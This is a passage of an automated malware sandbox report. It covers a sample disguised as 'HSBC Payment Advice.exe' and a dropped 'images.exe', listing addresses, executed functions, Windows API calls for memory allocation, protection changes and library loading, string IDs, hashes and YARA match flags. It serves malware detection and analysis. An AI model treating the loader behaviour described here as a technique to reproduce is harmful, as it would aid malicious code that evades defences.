                    0x00402109
                    0x0040210d
                    0x0040210f
                    0x00402111
                    0x00402113
                    0x00402115
                    0x00402117
                    0x00402119
                    0x0040211b
                    0x0040211f
                    0x00402122
                    0x00402124
                    0x00402137
                    0x0040213a
                    0x0040213b
                    0x00402141
                    0x00402143
                    0x00402148
                    0x0040214c
                    0x0040214f
                    0x00402153
                    0x00402155
                    0x00402157
                    0x0040215b
                    0x0040215f
                    0x00402167
                    0x00402171
                    0x00402173
                    0x00402175
                    0x00402177
                    0x0040217b
                    0x00402182
                    0x00402183
                    0x00402189
                    0x0040218c
                    0x0040218e
                    0x00402190
                    0x00402192
                    0x00402194
                    0x00402196
                    0x00402198
                    0x0040219a
                    0x0040219c
                    0x0040219e
                    0x004021a0
                    0x004021a2
                    0x004021a4
                    0x004021a6
                    0x004021a8
                    0x004021aa
                    0x004021ac
                    0x004021ae
                    0x004021b0
                    0x004021b2
                    0x004021b4
                    0x004021b6
                    0x004021b8
                    0x004021ba
                    0x004021bc
                    0x004021be
                    0x004021c0
                    0x004021c2
                    0x004021c4
                    0x004021c6
                    0x004021c8
                    0x004021ca
                    0x004021cc
                    0x004021ce
                    0x004021d0
                    0x004021d2
                    0x004021d7
                    0x004021de
                    0x004021df
                    0x004021e5
                    0x004021e8
                    0x004021ea
                    0x004021ec
                    0x004021ee
                    0x004021f0
                    0x004021f2
                    0x004021f4
                    0x004021f6
                    0x004021f8
                    0x004021fa
                    0x004021fc
                    0x004021fe
                    0x00402201
                    0x00402203
                    0x00402205
                    0x00402207
                    0x00402209
                    0x0040220b
                    0x0040220d
                    0x0040220f
                    0x00402211
                    0x00402213
                    0x00402215
                    0x00402217
                    0x00402219
                    0x0040221b
                    0x0040221d
                    0x0040221f
                    0x00402221
                    0x00402223
                    0x00402225
                    0x00402227
                    0x00402229
                    0x0040222b
                    0x0040222d
                    0x0040222f
                    0x00402231
                    0x00402233
                    0x00402235
                    0x00402237
                    0x00402239
                    0x0040223b
                    0x0040223d
                    0x0040223f
                    0x00402241
                    0x00402243
                    0x00402245
                    0x00402247
                    0x00402249
                    0x0040224b
                    0x0040224d
                    0x0040224f
                    0x00402251
                    0x00402253
                    0x00402255
                    0x00402257
                    0x00402259
                    0x0040225b
                    0x0040225d
                    0x0040225f
                    0x00402261
                    0x00402263
                    0x00402265
                    0x00402267
                    0x0040226b
                    0x00402272
                    0x00402273
                    0x00402279
                    0x0040227c
                    0x0040227e
                    0x00402280
                    0x00402282
                    0x00402284
                    0x00402287
                    0x0040228e
                    0x0040228f
                    0x00402295
                    0x00402298
                    0x0040229a
                    0x0040229c
                    0x0040229e
                    0x004022a3
                    0x004022ab
                    0x004022b1
                    0x004022b4
                    0x004022b6
                    0x004022b8
                    0x004022ba
                    0x004022bc
                    0x004022be
                    0x004022c0
                    0x004022c2
                    0x004022c4
                    0x004022c6
                    0x004022c8
                    0x004022ca
                    0x004022cc
                    0x004022ce
                    0x004022d0
                    0x004022d2
                    0x004022d4
                    0x004022d6
                    0x004022d8
                    0x004022da
                    0x004022dc
                    0x004022de
                    0x004022e0
                    0x004022e2
                    0x004022e4
                    0x004022e6
                    0x004022e8
                    0x004022ea
                    0x004022ef
                    0x004022f7
                    0x004022fd
                    0x00402300
                    0x00402302
                    0x00402304
                    0x00402306
                    0x00402308
                    0x0040230a
                    0x0040230c
                    0x0040230e
                    0x00402310
                    0x00402312
                    0x00402314
                    0x00402316
                    0x00402318
                    0x0040231a
                    0x0040231c
                    0x0040231e
                    0x00402320
                    0x00402322
                    0x00402324
                    0x00402326
                    0x00402328
                    0x0040232a
                    0x0040232c
                    0x0040232e
                    0x00402330
                    0x00402332
                    0x00402334
                    0x00402336
                    0x00402338
                    0x0040233a
                    0x0040233c
                    0x0040233e
                    0x00402340
                    0x00402342
                    0x00402344
                    0x00402346
                    0x0040234b
                    0x00402353
                    0x00402359
                    0x0040235c
                    0x0040235e
                    0x00402360
                    0x00402362
                    0x00402364
                    0x00402366
                    0x00402368
                    0x0040236a
                    0x0040236c
                    0x0040236e
                    0x00402370
                    0x00402372
                    0x00402374
                    0x00402376
                    0x00402378
                    0x0040237a
                    0x0040237c
                    0x0040237e
                    0x00402380
                    0x00402382
                    0x00402384
                    0x00402386
                    0x00402388
                    0x0040238a
                    0x0040238c
                    0x0040238e
                    0x00402390
                    0x00402392
                    0x00402394
                    0x00402396
                    0x00402398
                    0x0040239a
                    0x0040239c
                    0x0040239e
                    0x004023af

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378065024.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.378057635.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.378082997.0000000000419000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.378091336.000000000041B000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: #100
                    • String ID: VB5!6&*
                    • API String ID: 1341478452-3593831657
                    • Opcode ID: 0a816da0a65d68f3bb7e889559adb082e285275b811bbc9eef6c15ca525dd6fb
                    • Instruction ID: b56237a25a1983eca975bf346f4b9c8585693fc58b155836408167f7e9440dda
                    • Opcode Fuzzy Hash: 0a816da0a65d68f3bb7e889559adb082e285275b811bbc9eef6c15ca525dd6fb
                    • Instruction Fuzzy Hash: A781593144E7C08FD3034BB899B91A5BFB0AE1722071A06EBC4C2DF5B3D12C595AD766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Analysis Process: HSBC Payment Advice.exe PID: 5816 Parent PID: 6196 HSBC Payment Advice.exeCOMMON

                    Executed Functions

                    Function 017AFA19, Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.506796536.00000000017AF000.00000040.00000001.sdmp, Offset: 017AF000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: efb2c83050589a8eb8a9f1545c366b5d68573f61ab9fdba1d8f0fd711f9dfd3c
                    • Instruction ID: a94516e456bdefbae4c441204b4b7bc0c64bef0e2b274796aa0724753e37bb6b
                    • Opcode Fuzzy Hash: efb2c83050589a8eb8a9f1545c366b5d68573f61ab9fdba1d8f0fd711f9dfd3c
                    • Instruction Fuzzy Hash: 47411830A083828FCF179F2481643DAFFE3AF82219F8943D9D5558A153E33582C2CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017AF9CC, Relevance: 1.6, APIs: 1, Instructions: 82threadCOMMON
                    Download Yara Rule
                    APIs
                    • TerminateThread.KERNEL32(F5DF7ED1), ref: 017AFA5D
                    Memory Dump Source
                    • Source File: 0000000C.00000002.506796536.00000000017AF000.00000040.00000001.sdmp, Offset: 017AF000, based on PE: false
                    Similarity
                    • API ID: TerminateThread
                    • String ID:
                    • API String ID: 1852365436-0
                    • Opcode ID: b8f22c4ce5452105bf6adbd89093a9063c7529f52ca07f13c73c4877f420786e
                    • Instruction ID: 118571e43810fdd6f2749eb65e5645640ceaed69b8424974d7d55b15199fb707
                    • Opcode Fuzzy Hash: b8f22c4ce5452105bf6adbd89093a9063c7529f52ca07f13c73c4877f420786e
                    • Instruction Fuzzy Hash: 1A31C3315043068FDB299F25C598BADF7E3AF82326F96839AD9590B1A2D33545C4CB43
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Analysis Process: images.exe PID: 5216 Parent PID: 6136 images.exeCOMMON

                    Executed Functions

                    Function 017AF0C8, Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 909COMMON
                    Download Yara Rule
                    APIs
                    • K32GetDeviceDriverBaseNameA.KERNEL32 ref: 017AF7DE
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: BaseDeviceDriverName
                    • String ID: 2ohk$BTh5$H+ $TY&P$ilg
                    • API String ID: 2335996259-2432864370
                    • Opcode ID: 1b7fa8ff97414c49af994d6d4e8b85d5637cdaf8a0eb2e9c7227faed863d666c
                    • Instruction ID: cd2b5b6d7b10ea0a586aca4cf0a56074032a69dfc87955ff1cd23817d46d3bfb
                    • Opcode Fuzzy Hash: 1b7fa8ff97414c49af994d6d4e8b85d5637cdaf8a0eb2e9c7227faed863d666c
                    • Instruction Fuzzy Hash: 6A82E172544349DFCB789F24CD557EABBB2FF95300F95822ADC8A9B214D3309A85CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A95F9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125memorynativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 017ABD86: LoadLibraryA.KERNELBASE(?,8DB82309,?,017ADCD0,017A7854), ref: 017ABF6A
                    • NtAllocateVirtualMemory.NTDLL(-39C891F3,?,DFF19AC1), ref: 017A9853
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateLibraryLoadMemoryVirtual
                    • String ID: 2ohk$BTh5$H+
                    • API String ID: 2616484454-2489862345
                    • Opcode ID: 535a1f32db8a7b8ad27a06d9c3a22609a011eda79b064387a1ab5241132a3365
                    • Instruction ID: 8d624cf25b0aded5ad381be43be245f4113ae7f83da317d5553440801220e645
                    • Opcode Fuzzy Hash: 535a1f32db8a7b8ad27a06d9c3a22609a011eda79b064387a1ab5241132a3365
                    • Instruction Fuzzy Hash: 4541C371504385CFDB709F29CD987EABBA1FF99354F40022EDD8A9B621D7308A91CB02
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A922A, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNELBASE(?,5B463FEE), ref: 017A93DE
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 46d10713a5d1caa653937661127c242b86722134ba0626ed4c6113d9e7728a06
                    • Instruction ID: ffe7b394b5538c99ad488ab5a37beb55de393212764d397ac1106d862bc49e97
                    • Opcode Fuzzy Hash: 46d10713a5d1caa653937661127c242b86722134ba0626ed4c6113d9e7728a06
                    • Instruction Fuzzy Hash: 0B215975105304DFD7649E36CD55BEBB6B3AFE8300F52851D9DCA87215E33086848B03
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017AA3C5, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 017A95F9: NtAllocateVirtualMemory.NTDLL(-39C891F3,?,DFF19AC1), ref: 017A9853
                    • LdrInitializeThunk.NTDLL(6D72D74A,7E9A37E1,017AA82E,017A1CF5,?,?,?,?), ref: 017AA84C
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateInitializeMemoryThunkVirtual
                    • String ID:
                    • API String ID: 3902809231-0
                    • Opcode ID: 20424993e6fb4deb41ca1676d4e896c423f58781fe2239e36a11eff8b534cb34
                    • Instruction ID: d79ebf96f15a92c351d662ee899092704fe65a55a5c517c7ec67da81bb2b7d4f
                    • Opcode Fuzzy Hash: 20424993e6fb4deb41ca1676d4e896c423f58781fe2239e36a11eff8b534cb34
                    • Instruction Fuzzy Hash: CD017B315112858FC715AA21D804386BBE1BFC2752F99425DD8848B245CB31490BCF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017AEB88, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtProtectVirtualMemory.NTDLL(661EFB1B,?,?,?,?,017ADDF9,ABC772B1,017A7854), ref: 017AEC65
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MemoryProtectVirtual
                    • String ID:
                    • API String ID: 2706961497-0
                    • Opcode ID: b501210efaa3840a64851a78c6d8b97ff346e1988c5e28af4719cb8b94356e4f
                    • Instruction ID: 955c480e4b03bd5381dd6db7579d261c78675c79ce994b975fc735d7e2ce7843
                    • Opcode Fuzzy Hash: b501210efaa3840a64851a78c6d8b97ff346e1988c5e28af4719cb8b94356e4f
                    • Instruction Fuzzy Hash: C1013171B152559FEB38CE18C8449EA77A6AFC9300F45852EEC5997304C670AE418B56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017AF362, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                    Download Yara Rule
                    APIs
                    • K32GetDeviceDriverBaseNameA.KERNEL32 ref: 017AF7DE
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: BaseDeviceDriverName
                    • String ID: TY&P$ilg
                    • API String ID: 2335996259-1856522987
                    • Opcode ID: 560d48fba5488d87dde52d90c17b30f91eb2d3de399f452a431f722e64bdb8a4
                    • Instruction ID: 7c709f1ce8ff03971ef63a71be7a42137b8896458574111efd3b2a78c326b662
                    • Opcode Fuzzy Hash: 560d48fba5488d87dde52d90c17b30f91eb2d3de399f452a431f722e64bdb8a4
                    • Instruction Fuzzy Hash: B451BC72545288CFCF75DE28C9987EDBBA5EF95310FD1829ACC099F214C3309A818B52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A0B9B, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cdc803949280edabae1675856dd2fd79713951cc1824478970d5bd3a129c012
                    • Instruction ID: dc4ffd507c11714ce72042420e83ce18742f60e9847254b7400c4467f9d1dd65
                    • Opcode Fuzzy Hash: 2cdc803949280edabae1675856dd2fd79713951cc1824478970d5bd3a129c012
                    • Instruction Fuzzy Hash: 377189716193CA8FCB1ADF34C8551D5BFE2BF86314B584ADDE596CB203E3268286CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A8FD4, Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateCreateFileMemoryVirtual
                    • String ID:
                    • API String ID: 2773895085-0
                    • Opcode ID: 53fc19dbff131a0167f9292abecaf42678964d41f52fbcaa028d125856f7b703
                    • Instruction ID: 62e2e034456c11e9e4892c5eca0350d565499ad1fbd96904a0618815456a750f
                    • Opcode Fuzzy Hash: 53fc19dbff131a0167f9292abecaf42678964d41f52fbcaa028d125856f7b703
                    • Instruction Fuzzy Hash: 77516A7120828ADBCF228F24C9503DBFFA2BFD135CFA84395D7859A202E73591A58B01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A8FBC, Relevance: 1.6, APIs: 1, Instructions: 116fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 017ABD86: LoadLibraryA.KERNELBASE(?,8DB82309,?,017ADCD0,017A7854), ref: 017ABF6A
                    • CreateFileA.KERNELBASE(?,5B463FEE), ref: 017A93DE
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFileLibraryLoad
                    • String ID:
                    • API String ID: 2049390123-0
                    • Opcode ID: 9d8214c9ba6d2ce39fd29654c398565ca6b4b86b3b934d9ec88d7b0538997325
                    • Instruction ID: e5ec0298430a57959ed7927d88b61381f73b8b3e8428a590f6c43b4a4da2d7a7
                    • Opcode Fuzzy Hash: 9d8214c9ba6d2ce39fd29654c398565ca6b4b86b3b934d9ec88d7b0538997325
                    • Instruction Fuzzy Hash: 24312931508686DBDF238B348414396FFA1BFD2218FA447E9D7864A153E33651B68B41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A0C9A, Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • EnumWindows.USER32(00000000,?,017A0EAA,?,16A23E24,BEBF01A6,017A02EB,C1A53C1F,017AAC55,00000000,017A01A4), ref: 017A0D2B
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: EnumWindows
                    • String ID:
                    • API String ID: 1129996299-0
                    • Opcode ID: 49d9f052fe491413defdc50b99f729dd2a2df837f7b19b39f5fd8c4d5d54bc2f
                    • Instruction ID: a7ae33cdd84178e4ef3e6637878b43e99e61798d14898bd305fab6a56ec95316
                    • Opcode Fuzzy Hash: 49d9f052fe491413defdc50b99f729dd2a2df837f7b19b39f5fd8c4d5d54bc2f
                    • Instruction Fuzzy Hash: C531883250A38A9FCB15CE34C8495C5BFA1AF8A314F644AADD292DB553E3328203DB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A0C9D, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                    Download Yara Rule
                    APIs
                    • EnumWindows.USER32(00000000,?,017A0EAA,?,16A23E24,BEBF01A6,017A02EB,C1A53C1F,017AAC55,00000000,017A01A4), ref: 017A0D2B
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: EnumWindows
                    • String ID:
                    • API String ID: 1129996299-0
                    • Opcode ID: 29b5e5a5841515a7ce5135ab8cddb01e555b5e4a11730895b866bcedeb553a5a
                    • Instruction ID: 6a44cb4ebd4d010514bc85adf45a7d1131a769c62e78f78787c2fb6e90c39234
                    • Opcode Fuzzy Hash: 29b5e5a5841515a7ce5135ab8cddb01e555b5e4a11730895b866bcedeb553a5a
                    • Instruction Fuzzy Hash: 0E31477190A38A8FCB16CF34C8095C5BFE1AB86310B5449EED152CF283F3229257DB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017ABD86, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNELBASE(?,8DB82309,?,017ADCD0,017A7854), ref: 017ABF6A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: ef011ecc7ccacf77bfd230edd03abddbefafd310a7ffd0d60560dd5136c38c37
                    • Instruction ID: 02570dae7d9295c0fd4b8bc0e75ffdab5c06eb2fcdb40d61650bfdf5cd3f6fc4
                    • Opcode Fuzzy Hash: ef011ecc7ccacf77bfd230edd03abddbefafd310a7ffd0d60560dd5136c38c37
                    • Instruction Fuzzy Hash: 2D01B1706086C4EBDB389E298894AFDB7A9BFC8310FC4426EED0ED7205D6314A408B52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017AA37B, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b6ff4158dbdbd9cbeb0fe624006430bfb8323219a532a30da9b60a72a5ec2710
                    • Instruction ID: 494843325b78ce685321f4ee0fae6f937560267d12f3a31960a75b6155abfd1d
                    • Opcode Fuzzy Hash: b6ff4158dbdbd9cbeb0fe624006430bfb8323219a532a30da9b60a72a5ec2710
                    • Instruction Fuzzy Hash: 25F0C03110024157D3159936C800B16FBA36BD9300FB4C95EE0A2C7329C733C417D362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 017ADCC3, Relevance: 7.5, Strings: 5, Instructions: 1256COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LibraryLoadMemoryProtectVirtual
                    • String ID: 2ohk$BTh5$H+ $wAp$w;p
                    • API String ID: 3389902171-3885850358
                    • Opcode ID: 6cdee0e0a056495831b0e5525b5d804f35fab43c06412695d7e78b75e5ae4235
                    • Instruction ID: 4485c0c083643469fa0d74e00ab244c1c568465056f46e1364c38942ca6f1228
                    • Opcode Fuzzy Hash: 6cdee0e0a056495831b0e5525b5d804f35fab43c06412695d7e78b75e5ae4235
                    • Instruction Fuzzy Hash: A6B22771508385CFCB758F38CC947EABBA2FF95350F85826ADC899B295D7308A45CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017AC8BB, Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c4507e7b4afc62094d165437d6f0875bc2fc7865c1e9f733ea718c75b1f9a797
                    • Instruction ID: eb349ab1d8e0e104be6ba46254293b5796238e92d698f0ff13e2fd35619e9669
                    • Opcode Fuzzy Hash: c4507e7b4afc62094d165437d6f0875bc2fc7865c1e9f733ea718c75b1f9a797
                    • Instruction Fuzzy Hash: 21114875A04785EFDB75DF18C884BE6B3B2BB9C311F4546AAD9089B322C7349D44DB00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017A8FAA, Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                    • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                    • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                    • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017ABD0E, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                    • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                    • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                    • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                    Uniqueness

                    Uniqueness Score: -1.00%